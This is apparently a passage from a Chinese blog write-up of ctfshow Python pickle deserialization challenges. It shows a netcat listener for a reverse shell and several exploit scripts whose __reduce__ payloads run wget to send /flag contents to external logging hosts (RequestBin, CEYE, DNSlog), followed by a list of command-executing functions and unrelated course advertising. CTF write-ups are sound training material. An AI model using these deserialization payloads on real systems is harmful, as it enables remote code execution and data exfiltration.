ctfshow python反序列化 刷题记录

r=requests.get(url=url,params=params)
print(r.text)


然后先再 vps 上开启对应端口的监听在运行脚本(否则会报错)


以1234端口为例:



nc -lvnp 1234


![image-20240325162846097](https://img-blog.csdnimg.cn/img_convert/d719559fe4681a7f810be257bb442b80.png)


运行脚本后则会显示:


![image-20240325162614566](https://img-blog.csdnimg.cn/img_convert/afd7cba56fd03d374d5008124ee8ad0d.png)


此时就可以输入 Linux 命令来读取 flag 啦


![image-20240325162748641](https://img-blog.csdnimg.cn/img_convert/3e94c18f51cf3616e0be5444e85a2f84.png)


### dns 外带


#### RequestBin


网址:[RequestBin — Collect, inspect and debug HTTP requests and webhooks]( )


先点击 Create a RequestBin 获取一个 url


同样只需将脚本稍微改一下:



import os
import pickle
import base64
import requests

class exp(object):
def __reduce__(self):
payload = ‘wget http://requestbin.cn:80/1cpartx1?a=cat /flag
return (os.popen,(payload,))

a=exp()
b=pickle.dumps(a)
c=base64.b64encode(b)

url=“http://6ebe56d4-210d-4cbe-836f-078deeb4a9d0.challenge.ctf.show/backdoor”
params={‘data’:c}

r=requests.get(url=url,params=params)
print(r.text)


`wget`是一个在命令行下使用的下载工具,它可以从指定的URL下载文件。


运行脚本就能得到 flag


![image-20240325170204095](https://img-blog.csdnimg.cn/img_convert/f6fa6f826336004ae6beecc72a4e2764.png)


#### CEYE


网址:[CEYE - Monitor service for security testing]( )


可以稍微参考一下这篇文章:[RCE绕过之无回显-CSDN博客]( ),也可以在 http://ceye.io/payloads 中找相对应的 payload


在 http://ceye.io/profile 下的 Identifier 可以获取对应 url


同样只需将脚本稍微改一下:



import os
import pickle
import base64
import requests

class exp(object):
def __reduce__(self):
payload = ‘wget cat /flag.zrne70.ceye.io’
return (os.popen,(payload,))

a=exp()
b=pickle.dumps(a)
c=base64.b64encode(b)

url=“http://6ebe56d4-210d-4cbe-836f-078deeb4a9d0.challenge.ctf.show/backdoor”
params={‘data’:c}

r=requests.get(url=url,params=params)
print(r.text)


在 http://ceye.io/records/dns 即可找到 flag


![yqftM9pg8duAUEF](https://img-blog.csdnimg.cn/img_convert/99074b52d4dba4ea66c105a0c75e9863.png)


#### DNSlog


网址:[DNSLog Platform]( )


先点击 Get SubDomain 获取一个 url


同样只需将脚本稍微改一下:



import os
import pickle
import base64
import requests

class exp(object):
def __reduce__(self):
payload = ‘wget cat /flag.n4jlw3.dnslog.cn’
return (os.popen,(payload,))

a=exp()
b=pickle.dumps(a)
c=base64.b64encode(b)

url=“http://6ebe56d4-210d-4cbe-836f-078deeb4a9d0.challenge.ctf.show/backdoor”
params={‘data’:c}

r=requests.get(url=url,params=params)
print(r.text)


运行脚本后,回到 DNSlog 平台,点击 Refresh Record 就可看到被拼接的 flag


![image-20240327153137694](https://img-blog.csdnimg.cn/img_convert/ff4503f9c9aa474853534a7d390edd68.png)


## web278


提示:过滤了 os.system


使用上题脚本即可


python 可以执行命令的函数:



eval, execfile, compile, open, file, map, input,
os.system, os.popen, os.popen2, os.popen3, os.popen4, os.open, os.pipe,
os.listdir, os.access,
os.execl, os.execle, os.execlp, os.execlpe, os.execv,
os.execve, os.execvp, os.execvpe, os.spawnl, os.spawnle, os.spawnlp, os.spawnlpe,
os.spawnv, os.spawnve, os.spawnvp, os.spawnvpe,
pickle.load, pickle.loads,cPickle.load,cPickle.loads,
subprocess.call,subprocess.check_call,subprocess.check_output,subprocess.Popen,
文末有福利领取哦~

👉一、Python所有方向的学习路线

Python所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。img

👉二、Python必备开发工具

img
👉三、Python视频合集

观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
img

👉 四、实战案例

光学理论是没用的,要学会跟着一起敲,要动手实操,才能将自己的所学运用到实际当中去,这时候可以搞点实战案例来学习。(文末领读者福利)
img

👉五、Python练习题

检查学习结果。
img

👉六、面试资料

我们学习Python必然是为了找到高薪的工作,下面这些面试题是来自阿里、腾讯、字节等一线互联网大厂最新的面试资料,并且有阿里大佬给出了权威的解答,刷完这一套面试资料相信大家都能找到满意的工作。
img

img

👉因篇幅有限,仅展示部分资料,这份完整版的Python全套学习资料已经上传

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化学习资料的朋友,可以戳这里无偿获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

  • 10
    点赞
  • 30
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值